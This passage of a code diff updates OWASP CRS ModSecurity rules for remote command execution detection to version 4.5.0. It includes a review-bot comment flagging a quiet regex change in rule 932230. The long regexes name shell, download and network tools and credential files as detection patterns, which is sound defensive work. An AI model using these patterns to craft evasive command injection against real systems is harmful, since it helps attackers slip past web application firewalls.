*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ckz][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dg]|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[&,<>\|]|(?:[\-\.0-9A-Z_a-z][\"'\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\*\-0-9\?@_a-\{]*)?\x5c?)+[\s\x0b&,<>\|]).*|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:s|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:4|[\s\x0b&\),<>\|].*))|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||
&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*)?|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|(?:e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)\b" \ +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx 
(?i)(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(
\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[arx])?|(?:(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|x)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ckz][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|f[\"'\)\[\x5c]*(?:(
?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dg]|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[&,<>\|]|(?:[\-\.0-9A-Z_a-z][\"'\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\*\-0-9\?@_a-\{]*)?\x5c?)+[\s\x0b&,<>\|]).*|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:s|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:4|[\s\x0b&\),<>\|].*))|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*)?|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|(?:e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\
{]*)?\x5c?d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)\b" \ "id:932230,\ phase:2,\ block,\ 
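Review bot: The replaced `SecRule REQUEST_COOKIES|...` line for rule 932230 is not a pure `ver` bump: the alternation `\$(?:\(\(?|\{)` on the removed line has become `\$(?:\(\(?|[\[\{])` on the added line, so `$[` is now accepted alongside `$(`, `$((` and `${` as a construct that may precede the command word, which widens what this rule scores into `tx.rce_score`. Nothing in the hunk or in the commit title ("updates to CRS 4.5") signals that detection behaviour changes here, and the one functional edit is easy to lose among the hundreds of identical version-string lines. Since CRS regexes are assembled from generator sources rather than edited by hand, I would confirm this line is byte-identical to 932230 as shipped in CRS 4.5.0, check that the 932230 test file in this commit carries a positive case for the `$[` form, and name the behaviour change in the commit description. The rule's remaining options run on past `block,\` into the next hunk, which is cut off at the end of this view.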
@@ -25,11 +25,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\
s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:HEAD|POST|y(?:arn|elp))[\s\x0b&\)<>\|]|a(?:dd(?:group|user)|getty|(?:l(?:ias|pine)|xel)[\s\x0b&\)<>\|]|nsible|pt(?:-get|itude[\s\x0b&\)<>\|])|r(?:ch[\s\x0b&\)<>\|]|ia2c)|s(?:cii(?:-xfr|85)|pell)|tobm)|b(?:a(?:s(?:e(?:32|64|n(?:ame[\s\x0b&\)<>\|]|c))|h[\s\x0b&\)<>\|])|tch[\s\x0b&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\x0b&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\x0b&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu)|z(?:c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more))|c(?:a(?:ncel|psh)[\s\x0b&\)<>\|]|ertbot|h(?:attr|(?:dir|root)[\s\x0b&\)<>\|]|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f[\s\x0b&\)\-<>\|])|(?:flag|pas)s|g(?:pas
swd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\x0b&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\x0b&\)<>\|]|w(?:say|think))|p(?:an|io|ulimit)|r(?:ash[\s\x0b&\)<>\|]|on(?:[\s\x0b&\)<>\|]|tab))|s(?:cli[\s\x0b&\)<>\|]|plit|vtool)|u(?:psfilter|rl[\s\x0b&\)<>\|]))|d(?:(?:a(?:sh|te)|i(?:alog|ff))[\s\x0b&\)<>\|]|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\x0b&\)<>\|]|sbox)|pkg|vips)|e(?:2fsck|(?:asy_instal|va)l|cho[\s\x0b&\)<>\|]|fax|grep|macs|n(?:d(?:if|sw)|v-update)|sac|x(?:ec[\s\x0b&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\x0b&\)<>\|]|r)))|f(?:acter|(?:etch|lock|unction)[\s\x0b&\)<>\|]|grep|i(?:le(?:[\s\x0b&\)<>\|]|test)|(?:n(?:d|ger)|sh)[\s\x0b&\)<>\|])|o(?:ld[\s\x0b&\)<>\|]|reach)|ping|tp(?:stats|who))|g(?:awk[\s\x0b&\)<>\|]|core|e(?:ni(?:e[\s\x0b&\)<>\|]|soimage)|tfacl[\s\x0b&\)<>\|])|hci|i(?:mp[\s\x0b&\)<>\|]|nsh)|r(?:ep[\s\x0b&\)<>\|]|oup(?:[\s\x0b&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:ash|i(?:ghlight|story))[\s\x0b&\)<>\|]|e(?:ad[\s\x0b&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:conv|f(?:config|top)|nstall[\s\x0b&\)<>\|]|onice|p(?:6?tables|config)|spell)|j(?:ava[\s\x0b&\)<>\|]|exec|o(?:(?:bs|in)[\s\x0b&\)<>\|]|urnalctl)|runscript)|k(?:ill(?:[\s\x0b&\)<>\|]|all)|nife[\s\x0b&\)<>\|]|sshell)|l(?:a(?:st(?:[\s\x0b&\)<>\|]|comm|log(?:in)?)|tex[\s\x0b&\)<>\|])|dconfig|ess(?:[\s\x0b&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|(?:inks|ynx)[\s\x0b&\)<>\|]|o(?:(?:ca(?:l|te)|ok)[\s\x0b&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)|trace|ua(?:la)?tex|wp-(?:d(?:ownload|ump)|mirror|request)|z(?:4c(?:at)?|c(?:at|mp)|diff|[ef]?grep|less|m(?:a(?:dec|info)?|ore)))|m(?:a(?:il(?:[\s\x0b&\)<>q\|]|x[\s\x0b&\)<>\|])|ke[\s\x0b&\)<>\|]|ster\.passwd|wk)|k(?:dir[\s\x0b&\)<>\|]|fifo|nod|temp)|locate|o(?:squitto|unt[\s\x0b&\)<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|utt[\s\x0b&\)<>\|]|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:a(?:no[\s\x0b&\)<>\|]|sm|wk)|c(?:\.(?:openbsd|traditional)|at)|e(